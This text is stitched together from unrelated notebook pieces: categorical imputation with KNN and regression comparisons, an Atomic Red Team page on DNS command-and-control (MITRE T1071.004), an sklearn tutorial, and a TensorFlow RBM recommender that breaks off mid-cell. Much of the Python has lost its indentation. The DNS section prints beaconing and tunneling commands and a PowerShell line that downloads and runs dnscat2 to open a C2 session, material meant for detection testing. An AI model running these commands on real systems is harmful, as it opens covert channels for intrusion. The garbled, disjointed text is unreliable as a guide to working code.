ordinal_enc_dict[col_name] = OrdinalEncoder()
# select the non-null values in the column
col = users[col_name]
col_not_null = col[col.notnull()]
reshaped_vals = col_not_null.values.reshape(-1, 1)
# encode the non-null values of the column
    encoded_vals = ordinal_enc_dict[col_name].fit_transform(reshaped_vals)
    # store the encoded values back into the non-null positions of the column
    users.loc[col.notnull(), col_name] = np.squeeze(encoded_vals)
# we also create a unique encoder for each column and store it in the
# dictionary 'ordinal_enc_dict'; this lets us later convert the codes
# back to their respective categories
# imputing with KNN
users_KNN_imputed = users.copy(deep=True)
# create KNN imputer
KNN_imputer = KNN()
users_KNN_imputed.iloc[:,:] = np.round(KNN_imputer.fit_transform(users_KNN_imputed))
# finally, convert the ordinal codes back to their category labels using
# 'inverse_transform' with the encoder stored for each column
for col in users_KNN_imputed:
    reshaped_col = users_KNN_imputed[col].values.reshape(-1, 1)
    users_KNN_imputed[col] = ordinal_enc_dict[col].inverse_transform(reshaped_col)
```
### Ordinal encoding of a categorical column
- Imputing categorical values involves a few additional steps over imputing numerical values. We need to first convert them to numerical values as statistical operations cannot be performed on strings.
```
users = pd.read_csv('./../data/')
from sklearn.preprocessing import OrdinalEncoder
# Create Ordinal encoder
ambience_ord_enc = OrdinalEncoder()
# Select non-null values of ambience column in users
ambience = users['ambience']
ambience_not_null = ambience[ambience.notnull()]
# Reshape ambience_not_null to shape (-1, 1)
reshaped_vals = ambience_not_null.values.reshape(-1, 1)
# Ordinally encode reshaped_vals
encoded_vals = ambience_ord_enc.fit_transform(reshaped_vals)
# Assign back encoded values to non-null values of ambience in users
users.loc[ambience.notnull(), 'ambience'] = np.squeeze(encoded_vals)
# Ordinal encoding of a DataFrame
# Create an empty dictionary ordinal_enc_dict
ordinal_enc_dict = {}
for col_name in users:
# Create Ordinal encoder for col
ordinal_enc_dict[col_name] = OrdinalEncoder()
col = users[col_name]
print(ordinal_enc_dict)
# Select non-null values of col
col_not_null = col[col.notnull()]
reshaped_vals = col_not_null.values.reshape(-1, 1)
encoded_vals = ordinal_enc_dict[col_name].fit_transform(reshaped_vals)
# Store the values to non-null values of the column in users
users.loc[col.notnull(), col_name] = np.squeeze(encoded_vals)
```
- Using this for loop, we're now able to automate encoding all categorical columns in the DataFrame!
```
# Create KNN imputer
KNN_imputer = KNN()
# Impute and round the users DataFrame
users.iloc[:, :] = np.round(KNN_imputer.fit_transform(users))
# Loop over the column names in users
for col_name in users:
# Reshape the data
reshaped = users[col_name].values.reshape(-1, 1)
# Perform inverse transform of the ordinally encoded columns
users[col_name] = ordinal_enc_dict[col_name].inverse_transform(reshaped)
```
- We're now able to convert categorical values to numerical ones, impute them using machine learning, and then re-convert them to categorical ones!
## Evaluation of different imputation techniques
- In Data Science, we usually impute missing data in order to improve model performance and decrease bias.
- Imputation with maximum machine learning model performance is selected.
- We can also use a simple linear regression on the various imputations we have done.
- **Another way to observe the imputation performance is to observe their density plots and see which one most resembles the shape of the original data**
- To perform linear regression we can use the statsmodels package as it produces various statistical summaries.
- Fit a linear model for statistical summary
- We can first create the complete case `diabetes_cc` by dropping the rows with missing values.
- This will be the baseline model to compare against other imputations.
```python
import statsmodels.api as sm
diabetes_cc = diabetes.dropna(how='any')
X = sm.add_constant(diabetes_cc.iloc[:, : -1])
y = diabetes_cc["Class"]
lm = sm.OLS(y,X).fit()
print(lm.summary())
```
#### R-squared and Coefficients
- While the R-squared measures the accuracy of the machine learning model, the coefficients explain the weights of the different features in the data. The higher the R-squared, the better the model.
- We can get the R-squared and coefficients using `lm.rsquared_adj` and `lm.params`
#### Fit linear model on different imputed Dataframes
```python
# mean imputation
X = sm.add_constant(diabetes_mean_imputed.iloc[:,:-1])
y = diabetes['Class']
lm_mean = sm.OLS(y, X).fit()
# KNN imputation
X = sm.add_constant(diabetes_knn_imputed.iloc[:,:-1])
lm_KNN = sm.OLS(y, X).fit()
# MICE Imputation
X = sm.add_constant(diabetes_mice_imputed.iloc[:,:-1])
lm_MICE = sm.OLS(y, X).fit()
```
#### Comparing R-squared of different imputations
```python
print(pd.DataFrame({'Complete':lm.rsquared_adj,
'Mean Imp':lm_mean.rsquared_adj,
'KNN Imp':lm_KNN.rsquared_adj,
'MICE Imp':lm_MICE.rsquared_adj},
index=['R_squared_adj']))
```
- We observe that the mean imputation has the least R-squared as it imputes the same mean value throughout the column.
- The complete case has the highest R-squared as half the rows with missing values have been dropped for fitting the linear model.
- We can similarly compare the coefficients of each of the imputations using the `.params` attribute
```python
print(pd.DataFrame({'Complete':lm.params,
'Mean Imp':lm_mean.params,
'KNN Imp':lm_KNN.params,
                    'MICE Imp':lm_MICE.params}))
```
- We see that the coefficients differ across the imputations, showing that the imputed values shift the weights assigned to these features.
#### Comparing density plots
- We can compare the density plots of the imputations to check which imputation most resembles the original dataset and does not introduce a bias.
```python
diabetes_cc['Skin_Fold'].plot(kind='kde', c='red', linewidth=3)
diabetes_mean_imputed['Skin_Fold'].plot(kind='kde')
diabetes_knn_imputed['Skin_Fold'].plot(kind='kde')
diabetes_mice_imputed['Skin_Fold'].plot(kind='kde')
labels = ['Baseline (complete case)', 'Mean Imputation', 'KNN Imputation', 'MICE Imputation']
plt.legend(labels)
plt.xlabel('Skin Fold')
```
- We observe that the mean imputation is completely out of shape as compared to the other imputations.
- The KNN and MICE imputations are much closer to the base DataFrame, with the peak of the MICE imputation being slightly shifted.
### Analyze the summary of linear model
- Analyzing the performance of the different imputed models is one of the most significant tasks in dealing with missing data. It determines the type of imputed DataFrame we can rely upon.
- For analysis, we can fit a linear regression model on the imputed DataFrame and check for various parameters that impact the selection of the imputation type.
```
diabetes_cc = pd.read_csv('./../data/pima-indians-diabetes data.csv')
diabetes_cc.head()
```
### Drop missing values : base line dataset
```
diabetes_cc.dropna(inplace=True)
diabetes_cc.reset_index(inplace = True, drop=True)
diabetes_cc.head()
print(diabetes_cc.shape)
diabetes_cc.isnull().sum()
import statsmodels.api as sm
# Add constant to X and set X & y values to fit linear model
X = sm.add_constant(diabetes_cc.iloc[:, : -1])
y = diabetes_cc["Class"]
lm = sm.OLS(y, X).fit()
# linear model for mean imputation
X = sm.add_constant(diabetes_mean.iloc[:,:-1])
y = diabetes_mean['Class']
lm_mean = sm.OLS(y, X).fit()
# linear model for KNN imputation
X = sm.add_constant(diabetes_knn_imputed.iloc[:,:-1])
y = diabetes_knn_imputed['Class']
lm_KNN = sm.OLS(y, X).fit()
# linear model for MICE imputation
X = sm.add_constant(diabetes_mice_imputed.iloc[:,:-1])
y = diabetes_mice_imputed['Class']
lm_MICE = sm.OLS(y, X).fit()
# Print summary of lm
print('\nSummary: ', lm.summary())
# Print R squared score of lm
print('\nAdjusted R-squared score: ', lm.rsquared_adj)
# Print the params of lm
print('\nCoefficients:\n', lm.params)
```
## Comparing R-squared and coefficients : Numerical analysis
- When analyzing imputed DataFrames with a linear model, the R-squared score, which reflects the model's accuracy, and the coefficients, which describe the model itself, are important characteristics for checking the quality of an imputation.
```
# Store the Adj. R-squared scores of the linear models
r_squared = pd.DataFrame({'Complete Case': lm.rsquared_adj,
'Mean Imputation': lm_mean.rsquared_adj,
'KNN Imputation': lm_KNN.rsquared_adj,
'MICE Imputation': lm_MICE.rsquared_adj},
index=['Adj. R-squared'])
print(r_squared)
# Store the coefficients of the linear models
coeff = pd.DataFrame({'Complete Case': lm.params,
'Mean Imputation': lm_mean.params,
'KNN Imputation': lm_KNN.params,
'MICE Imputation': lm_MICE.params})
print(coeff)
r_squares = {'KNN Imputation': lm_KNN.rsquared_adj,
'Mean Imputation': lm_mean.rsquared_adj,
'MICE Imputation': lm_MICE.rsquared_adj}
# Select best R-squared
best_imputation = max(r_squares, key=r_squares.get)
print("The best imputation technique is: ", best_imputation)
```
### Comparing density plots : Graphical analysis
- The different imputations we performed earlier can be compared graphically with their density plots to see which dataset's distribution is most similar to the original dataset. This also lets us spot a biased imputation.
```
# Plot graphs of imputed DataFrames and the complete case
diabetes_cc['Skin_Fold'].plot(kind='kde', c='red', linewidth=3)
diabetes_mean['Skin_Fold'].plot(kind='kde')
diabetes_knn_imputed['Skin_Fold'].plot(kind='kde')
diabetes_mice_imputed['Skin_Fold'].plot(kind='kde')
# Create labels for the four DataFrames
labels = ['Baseline (Complete Case)', 'Mean Imputation', 'KNN Imputation', 'MICE Imputation']
plt.legend(labels)
# Set the x-label as Skin Fold
plt.xlabel('Skin_Fold')
plt.show()
```
# T1071.004 - Application Layer Protocol: DNS
Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling)
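As a purely illustrative sketch (not taken from the cited reports), the encoding side of DNS tunneling can be shown in a few lines of Python: data is encoded with a DNS-safe alphabet, split into labels of at most 63 characters, and carried as subdomains of an attacker-controlled zone. The domain name and chunk size here are assumptions for illustration only.

```python
import base64

def encode_for_dns(payload: bytes, domain: str, max_label: int = 63):
    """Encode a payload into DNS-safe query names (illustrative only)."""
    # Base32 is case-insensitive and uses only DNS-safe characters
    encoded = base64.b32encode(payload).decode().rstrip("=")
    # DNS limits each label to 63 characters
    chunks = [encoded[i:i + max_label] for i in range(0, len(encoded), max_label)]
    # Each query carries one chunk as the leftmost subdomain label
    return [f"{chunk}.{domain}" for chunk in chunks]

queries = encode_for_dns(b"exfiltrated data", "c2.example.com")
print(queries)
```

A real implant would then issue these names as lookups (often TXT queries), and the authoritative server for the zone would decode the labels on the other side.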
## Atomic Tests
```
#Import the Module before running the tests.
# Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.
Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 -Force
```
### Atomic Test #1 - DNS Large Query Volume
This test simulates an infected host sending a large volume of DNS queries to a command and control server.
The intent of this test is to trigger threshold-based detection on the number of DNS queries, either from a single source system or to a single target domain.
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
for($i=0; $i -le 1000; $i++) { Resolve-DnsName -type "TXT" "atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io" -QuickTimeout}
```
```
Invoke-AtomicTest T1071.004 -TestNumbers 1
```
### Atomic Test #2 - DNS Regular Beaconing
This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time.
This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold-based detection.
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
Set-Location PathToAtomicsFolder
.\T1071.004\src\T1071-dns-beacon.ps1 -Domain 127.0.0.1.xip.io -Subdomain atomicredteam -QueryType TXT -C2Interval 30 -C2Jitter 20 -RunTime 30
```
```
Invoke-AtomicTest T1071.004 -TestNumbers 2
```
### Atomic Test #3 - DNS Long Domain Query
This test simulates an infected host returning data to a command and control server using long domain names.
The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold.
Upon execution, DNS information about the domain will be displayed for each callout.
**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
Set-Location PathToAtomicsFolder
.\T1071.004\src\T1071-dns-domain-length.ps1 -Domain 127.0.0.1.xip.io -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType TXT
```
```
Invoke-AtomicTest T1071.004 -TestNumbers 3
```
### Atomic Test #4 - DNS C2
This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command.
The following blogs have more information.
https://github.com/iagox86/dnscat2
https://github.com/lukebaggett/dnscat2-powershell
**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
Start-Dnscat2 -Domain example.com -DNSServer 127.0.0.1
```
```
Invoke-AtomicTest T1071.004 -TestNumbers 4
```
## Detection
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)
Monitor for DNS traffic to/from known-bad or suspicious domains.
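One of the heuristics above (unusual query names) can be prototyped with a short, illustrative Python sketch; the length and entropy thresholds are assumptions for demonstration, not recommended production values:

```python
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of a string."""
    counts = Counter(s)
    total = len(s)
    return -sum(c / total * math.log2(c / total) for c in counts.values())

def is_suspicious(qname: str, max_len: int = 52, max_entropy: float = 4.0) -> bool:
    """Flag long or high-entropy query names (illustrative thresholds)."""
    label = qname.split(".")[0]  # the leftmost label usually carries tunneled data
    return len(qname) > max_len or shannon_entropy(label) > max_entropy

print(is_suspicious("www.example.com"))
print(is_suspicious("mzxw6ytboi2dqmjsgm2tknrw.tunnel.example.com"))
```

In practice these per-query checks would be combined with the volume and beaconing detections exercised by the atomic tests above, since benign CDN and telemetry domains can also produce long, random-looking names.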
```
import pandas as pd
```
# Classification
We'll take a tour of the methods for classification in sklearn. First let's load a toy dataset to use:
```
from sklearn.datasets import load_breast_cancer
breast = load_breast_cancer()
```
Let's take a look
```
# Convert it to a dataframe for better visuals
df = pd.DataFrame(breast.data)
df.columns = breast.feature_names
df
```
And now look at the targets
```
print(breast.target_names)
breast.target
```
## Classification Trees
Using the scikit-learn models is basically the same as in Julia's ScikitLearn.jl
```
from sklearn.tree import DecisionTreeClassifier
cart = DecisionTreeClassifier(max_depth=2, min_samples_leaf=140)
cart.fit(breast.data, breast.target)
```
Here's a helper function to plot the trees.
# Installing Graphviz (tedious)
## Windows
1. Download graphviz from https://graphviz.gitlab.io/_pages/Download/Download_windows.html
2. Install it by running the .msi file
3. Set the path variable:
(a) Go to Control Panel > System and Security > System > Advanced System Settings > Environment Variables > Path > Edit
(b) Add 'C:\Program Files (x86)\Graphviz2.38\bin'
4. Run `conda install graphviz`
5. Run `conda install python-graphviz`
## macOS and Linux
1. Run `brew install graphviz` (install `brew` from https://docs.brew.sh/Installation if you don't have it)
2. Run `conda install graphviz`
3. Run `conda install python-graphviz`
```
import graphviz
import sklearn.tree
def visualize_tree(sktree):
dot_data = sklearn.tree.export_graphviz(sktree, out_file=None,
filled=True, rounded=True,
special_characters=False,
feature_names=df.columns)
return graphviz.Source(dot_data)
visualize_tree(cart)
```
We can get the label predictions with the `.predict` method
```
labels = cart.predict(breast.data)
labels
```
And similarly the predicted probabilities with `.predict_proba`
```
probs = cart.predict_proba(breast.data)
probs
```
Just like in Julia, the probabilities are returned for each class
```
probs.shape
```
We can extract the second column of the probs by slicing, just like how we did it in Julia
```
probs = cart.predict_proba(breast.data)[:,1]
probs
```
To evaluate the model, we can use functions from `sklearn.metrics`
```
from sklearn.metrics import roc_auc_score, accuracy_score, confusion_matrix
roc_auc_score(breast.target, probs)
accuracy_score(breast.target, labels)
confusion_matrix(breast.target, labels)
```
## Random Forests and Boosting
We use random forests and boosting in the same way as CART
```
from sklearn.ensemble import RandomForestClassifier
forest = RandomForestClassifier(n_estimators=100)
forest.fit(breast.data, breast.target)
labels = forest.predict(breast.data)
probs = forest.predict_proba(breast.data)[:,1]
print(roc_auc_score(breast.target, probs))
print(accuracy_score(breast.target, labels))
confusion_matrix(breast.target, labels)
from sklearn.ensemble import GradientBoostingClassifier
boost = GradientBoostingClassifier(n_estimators=100, learning_rate=0.1)
boost.fit(breast.data, breast.target)
labels = boost.predict(breast.data)
probs = boost.predict_proba(breast.data)[:,1]
print(roc_auc_score(breast.target, probs))
print(accuracy_score(breast.target, labels))
confusion_matrix(breast.target, labels)
```
## Logistic Regression
We can also access logistic regression from sklearn
```
from sklearn.linear_model import LogisticRegression
logit = LogisticRegression()
logit.fit(breast.data, breast.target)
labels = logit.predict(breast.data)
probs = logit.predict_proba(breast.data)[:,1]
print(roc_auc_score(breast.target, probs))
print(accuracy_score(breast.target, labels))
confusion_matrix(breast.target, labels)
```
The sklearn implementation has options for regularization in logistic regression. You can choose between L1 and L2 regularization:


Note that this regularization is ad hoc and **not equivalent to robustness**. For a robust logistic regression, follow the approach from 15.680.
You control the regularization with the `penalty` and `C` hyperparameters. We can see that our model above used L2 regularization with $C=1$.
### Exercise
Try out unregularized logistic regression as well as L1 regularization. Which of the three options seems best? What if you try changing $C$?
```
# No regularization
logit = LogisticRegression(C=1e10)
logit.fit(breast.data, breast.target)
labels = logit.predict(breast.data)
probs = logit.predict_proba(breast.data)[:,1]
print(roc_auc_score(breast.target, probs))
print(accuracy_score(breast.target, labels))
confusion_matrix(breast.target, labels)
# L1 regularization
logit = LogisticRegression(C=100, penalty='l1', solver='liblinear')  # liblinear supports the L1 penalty
logit.fit(breast.data, breast.target)
labels = logit.predict(breast.data)
probs = logit.predict_proba(breast.data)[:,1]
print(roc_auc_score(breast.target, probs))
print(accuracy_score(breast.target, labels))
confusion_matrix(breast.target, labels)
```
# Regression
Now let's take a look at regression in sklearn. Again we can start by loading up a dataset.
```
from sklearn.datasets import load_boston
boston = load_boston()
print(boston.DESCR)
```
Take a look at the X
```
df = pd.DataFrame(boston.data)
df.columns = boston.feature_names
df
boston.target
```
## Regression Trees
We use regression trees in the same way as classification
```
from sklearn.tree import DecisionTreeRegressor
cart = DecisionTreeRegressor(max_depth=2, min_samples_leaf=5)
cart.fit(boston.data, boston.target)
visualize_tree(cart)
```
Like for classification, we get the predicted labels out with the `.predict` method
```
preds = cart.predict(boston.data)
preds
```
There are functions provided by `sklearn.metrics` to evaluate the predictions
```
from sklearn.metrics import mean_absolute_error, mean_squared_error, r2_score
print(mean_absolute_error(boston.target, preds))
print(mean_squared_error(boston.target, preds))
print(r2_score(boston.target, preds))
```
## Random Forests and Boosting
Random forests and boosting for regression work the same as in classification, except we use the `Regressor` version rather than `Classifier`.
### Exercise
Test and compare the (in-sample) performance of random forests and boosting on the Boston data with some sensible parameters.
```
from sklearn.ensemble import RandomForestRegressor
forest = RandomForestRegressor(n_estimators=100)
forest.fit(boston.data, boston.target)
preds = forest.predict(boston.data)
print(mean_absolute_error(boston.target, preds))
print(mean_squared_error(boston.target, preds))
print(r2_score(boston.target, preds))
from sklearn.ensemble import GradientBoostingRegressor
boost = GradientBoostingRegressor(n_estimators=100, learning_rate=0.2)
boost.fit(boston.data, boston.target)
preds = boost.predict(boston.data)
print(mean_absolute_error(boston.target, preds))
print(mean_squared_error(boston.target, preds))
print(r2_score(boston.target, preds))
```
## Linear Regression Models
There are a large collection of linear regression models in sklearn. Let's start with a simple ordinary linear regression
```
from sklearn.linear_model import LinearRegression
linear = LinearRegression()
linear.fit(boston.data, boston.target)
preds = linear.predict(boston.data)
print(mean_absolute_error(boston.target, preds))
print(mean_squared_error(boston.target, preds))
print(r2_score(boston.target, preds))
```
We can also take a look at the betas:
```
linear.coef_
```
We can use regularized models as well. Here is ridge regression:
```
from sklearn.linear_model import Ridge
ridge = Ridge(alpha=10)
ridge.fit(boston.data, boston.target)
preds = ridge.predict(boston.data)
print(mean_absolute_error(boston.target, preds))
print(mean_squared_error(boston.target, preds))
print(r2_score(boston.target, preds))
ridge.coef_
```
And here is lasso
```
from sklearn.linear_model import Lasso
lasso = Lasso(alpha=1)
lasso.fit(boston.data, boston.target)
preds = lasso.predict(boston.data)
print(mean_absolute_error(boston.target, preds))
print(mean_squared_error(boston.target, preds))
print(r2_score(boston.target, preds))
lasso.coef_
```
There are many other linear regression models available. See the [linear model documentation](http://scikit-learn.org/stable/modules/linear_model.html) for more.
### Exercise
The elastic net is another linear regression method that combines ridge and lasso regularization. Try running it on this dataset, referring to the documentation as needed to learn how to use it and control the hyperparameters.
```
from sklearn.linear_model import ElasticNet
net = ElasticNet(l1_ratio=0.3, alpha=1)
net.fit(boston.data, boston.target)
preds = net.predict(boston.data)
print(mean_absolute_error(boston.target, preds))
print(mean_squared_error(boston.target, preds))
print(r2_score(boston.target, preds))
net.coef_
```
<h1 align="center"><font size="5">RECOMMENDATION SYSTEM WITH A RESTRICTED BOLTZMANN MACHINE</font></h1>
Welcome to the <b>Recommendation System with a Restricted Boltzmann Machine</b> notebook. In this notebook, we study and go over the usage of a Restricted Boltzmann Machine (RBM) in a Collaborative Filtering based recommendation system. This system is an algorithm that recommends items by trying to find users that are similar to each other based on their item ratings. By the end of this notebook, you should have a deeper understanding of how Restricted Boltzmann Machines are applied, and how to build one using TensorFlow.
<h2>Table of Contents</h2>
<ol>
<li><a href="#ref1">Acquiring the Data</a></li>
<li><a href="#ref2">Loading in the Data</a></li>
<li><a href="#ref3">The Restricted Boltzmann Machine model</a></li>
<li><a href="#ref4">Setting the Model's Parameters</a></li>
<li><a href="#ref5">Recommendation</a></li>
</ol>
<br>
<br>
<hr>
<a id="ref1"></a>
<h2>Acquiring the Data</h2>
To start, we need to download the data we are going to use for our system. The datasets we are going to use were acquired by <a href="http://grouplens.org/datasets/movielens/">GroupLens</a> and contain movies, users and movie ratings by these users.
After downloading the data, we will extract the datasets to a directory that is easily accessible.
```
!wget -c https://raw.githubusercontent.com/IBM/dl-learning-path-assets/main/unsupervised-deeplearning/data/ml-1m.zip -O moviedataset.zip
!unzip -o moviedataset.zip
```
With the datasets in place, let's now import the necessary libraries. We will be using <a href="https://www.tensorflow.org/">Tensorflow</a> and <a href="http://www.numpy.org/">Numpy</a> together to model and initialize our Restricted Boltzmann Machine and <a href="http://pandas.pydata.org/pandas-docs/stable/">Pandas</a> to manipulate our datasets. To import these libraries, run the code cell below.
```
#Tensorflow library. Used to implement machine learning models
import tensorflow as tf
#Numpy contains helpful functions for efficient mathematical calculations
import numpy as np
#Dataframe manipulation library
import pandas as pd
#Graph plotting library
import matplotlib.pyplot as plt
%matplotlib inline
```
<hr>
<a id="ref2"></a>
<h2>Loading in the Data</h2>
Let's begin by loading in our data with Pandas. The .dat files containing our data are similar to CSV files, but instead of using the ',' (comma) character to separate entries, it uses '::' (two colons) characters instead. To let Pandas know that it should separate data points at every '::', we have to specify the <code>sep='::'</code> parameter when calling the function.
Additionally, we also pass it the <code>header=None</code> parameter due to the fact that our files don't contain any headers.
Let's start with the movies.dat file and take a look at its structure:
```
#Loading in the movies dataset
movies_df = pd.read_csv('ml-1m/movies.dat', sep='::', header=None, engine='python')
movies_df.head()
```
We can do the same for the ratings.dat file:
```
#Loading in the ratings dataset
ratings_df = pd.read_csv('ml-1m/ratings.dat', sep='::', header=None, engine='python')
ratings_df.head()
```
So our <b>movies_df</b> variable contains a dataframe that stores a movie's unique ID number, title and genres, while our <b>ratings_df</b> variable stores a unique User ID number, a movie's ID that the user has watched, the user's rating to said movie and when the user rated that movie.
Let's now rename the columns in these dataframes so we can convey their data more intuitively:
```
movies_df.columns = ['MovieID', 'Title', 'Genres']
movies_df.head()
```
And our final ratings_df:
```
ratings_df.columns = ['UserID', 'MovieID', 'Rating', 'Timestamp']
ratings_df.head()
```
<hr>
<a id="ref3"></a>
<h2>The Restricted Boltzmann Machine model</h2>
<img src="https://github.com/fawazsiddiqi/recommendation-system-with-a-Restricted-Boltzmann-Machine-using-tensorflow/blob/master/images/films.png?raw=true" width="300">
<br>
The Restricted Boltzmann Machine model has two layers of neurons: a visible input layer and a hidden layer. The hidden layer learns features from the information fed through the input layer. For our model, the input will contain X neurons, where X is the number of movies in our dataset. Each of these neurons holds a normalized rating value from 0 to 1, where 0 means the user has not watched that movie, and the closer the value is to 1, the more the user likes the movie that neuron represents. These normalized values, of course, are extracted and normalized from the ratings dataset.
After passing in the input, we train the RBM on it and have the hidden layer learn its features. These features are what we use to reconstruct the input, which in our case predicts the ratings for movies the user hasn't watched, and that is exactly what we can use to recommend movies!
We will now begin to format our dataset to follow the model's expected input.
<h3>Formatting the Data</h3>
First let's see how many movies we have and see if the movie ID's correspond with that value:
```
len(movies_df)
```
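If we want to make that check explicit, we can compare the highest MovieID against the row count. Here is a small sketch with a stand-in frame (in the notebook you would use `movies_df` directly):

```python
import pandas as pd

# Stand-in for movies_df; in the notebook, use the loaded frame directly
movies = pd.DataFrame({'MovieID': [1, 2, 3, 5, 8]})

n_rows = len(movies)
max_id = movies['MovieID'].max()
print(f"{n_rows} movies, highest MovieID = {max_id}")
# A mismatch means IDs are not contiguous, so some MovieID values are unused
```

If the two numbers differ, IDs are not contiguous, which is why pivoting on MovieID below is safer than assuming a 1..N range.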
Now, we can start formatting the data into input for the RBM. We're going to store the normalized user ratings as a user-by-movie matrix called trX.
```
user_rating_df = ratings_df.pivot(index='UserID', columns='MovieID', values='Rating')
user_rating_df.head()
```
Let's normalize it now:
```
norm_user_rating_df = user_rating_df.fillna(0) / 5.0
trX = norm_user_rating_df.values
trX[0:5]
```
<hr>
<a id="ref4"></a>
<h2>Setting the Model's Parameters</h2>
Next, let's start building our RBM with TensorFlow. We'll begin by determining the number of neurons in the hidden layer and then creating variables for storing our visible layer biases, hidden layer biases and the weights that connect the hidden layer with the visible layer. We will arbitrarily set the number of neurons in the hidden layer to 20. You can freely set this value to any number you want, since each neuron in the hidden layer will end up learning a feature.
```
hiddenUnits = 20
visibleUnits = len(user_rating_df.columns)
vb = tf.Variable(tf.zeros([visibleUnits]), tf.float32) #Number of unique movies
hb = tf.Variable(tf.zeros([hiddenUnits]), tf.float32) #Number of features we're going to learn
W = tf.Variable(tf.zeros([visibleUnits, hiddenUnits]), tf.float32)
```
We then move on to creating the visible and hidden layer units and setting their activation functions. In this case, we will be using the <code>tf.sigmoid</code> and <code>tf.relu</code> functions as nonlinear activations, since they are commonly used in RBMs.
```
v0 = tf.zeros([visibleUnits], tf.float32)
#testing to see if the matrix product works
tf.matmul([v0], W)
#Phase 1: Input Processing
#defining a function to return only the generated hidden states
def hidden_layer(v0_state, W, hb):
h0_prob = tf.nn.sigmoid(tf.matmul([v0_state], W) + hb) #probabilities of the hidden units
h0_state = tf.nn.relu(tf.sign(h0_prob - tf.random.uniform(tf.shape(h0_prob)))) #sample_h_given_X
return h0_state
#printing output of zeros input
h0 = hidden_layer(v0, W, hb)
print("first 15 hidden states: ", h0[0][0:15])
def reconstructed_output(h0_state, W, vb):
v1_prob = tf.nn.sigmoid(tf.matmul(h0_state, tf.transpose(W)) + vb)
v1_state = tf.nn.relu(tf.sign(v1_prob - tf.random.uniform(tf.shape(v1_prob)))) #sample_v_given_h
return v1_state[0]
v1 = reconstructed_output(h0, W, vb)
print("hidden state shape: ", h0.shape)
print("v0 state shape: ", v0.shape)
print("v1 state shape: ", v1.shape)
```
And set the error function, which in this case will be the mean squared error.
```
def error(v0_state, v1_state):
return tf.reduce_mean(tf.square(v0_state - v1_state))
err = tf.reduce_mean(tf.square(v0 - v1))
print("error" , err.numpy())
```
Now we train the RBM for 5 epochs, each epoch using a batch size of 500, giving 12 batches. After training, we plot a graph of the error by epoch.
```
epochs = 5
batchsize = 500
errors = []
weights = []
K=1
alpha = 0.1
#creating datasets
train_ds = \
tf.data.Dataset.from_tensor_slices((np.float32(trX))).batch(batchsize)
#for i in range(epochs):
# for start, end in zip( range(0, len(trX), batchsize), range(batchsize, len(trX), batchsize)):
# batch = trX[start:end]
# cur_w = sess.run(update_w, feed_dict={v0: batch, W: prv_w, vb: prv_vb, hb: prv_hb})
# cur_vb = sess.run(update_vb, feed_dict={v0: batch, W: prv_w, vb: prv_vb, hb: prv_hb})
# cur_nb = sess.run(update_hb, feed_dict={v0: batch, W: prv_w, vb: prv_vb, hb: prv_hb})
# prv_w = cur_w
# prv_vb = cur_vb
# prv_hb = cur_hb
# errors.append(sess.run(err_sum, feed_dict={v0: trX, W: cur_w, vb: cur_vb, hb: cur_hb}))
# print (errors[-1])
v0_state=v0
for epoch in range(epochs):
batch_number = 0
for batch_x in train_ds:
for i_sample in range(len(batch_x)):
for k in range(K):
v0_state = batch_x[i_sample]
h0_state = hidden_layer(v0_state, W, hb)
v1_state = reconstructed_output(h0_state, W, vb)
h1_state = hidden_layer(v1_state, W, hb)
delta_W = tf.matmul(tf.transpose([v0_state]), h0_state) - tf.matmul(tf.transpose([v1_state]), h1_state)
W = W + alpha * delta_W
vb = vb + alpha * tf.reduce_mean(v0_state - v1_state, 0)
hb = hb + alpha * tf.reduce_mean(h0_state - h1_state, 0)
v0_state = v1_state
if i_sample == len(batch_x)-1:
err = error(batch_x[i_sample], v1_state)
errors.append(err)
weights.append(W)
print ( 'Epoch: %d' % (epoch + 1),
"batch #: %i " % batch_number, "of %i" % (len(trX)/batchsize),
"sample #: %i" % i_sample,
'reconstruction error: %f' % err)
batch_number += 1
plt.plot(errors)
plt.ylabel('Error')
plt.xlabel('Epoch')
plt.show()
```
<hr>
<a id="ref5"></a>
<h2>Recommendation</h2>
We can now predict movies that an arbitrarily selected user might like. This can be accomplished by feeding in the user's watched movie preferences into the RBM and then reconstructing the input. The values that the RBM gives us will attempt to estimate the user's preferences for movies that he hasn't watched based on the preferences of the users that the RBM was trained on.
Let's first select a <b>User ID</b> for our mock user:
```
mock_user_id = 215
#Selecting the input user
inputUser = trX[mock_user_id-1].reshape(1, -1)
inputUser = tf.convert_to_tensor(trX[mock_user_id-1],"float32")
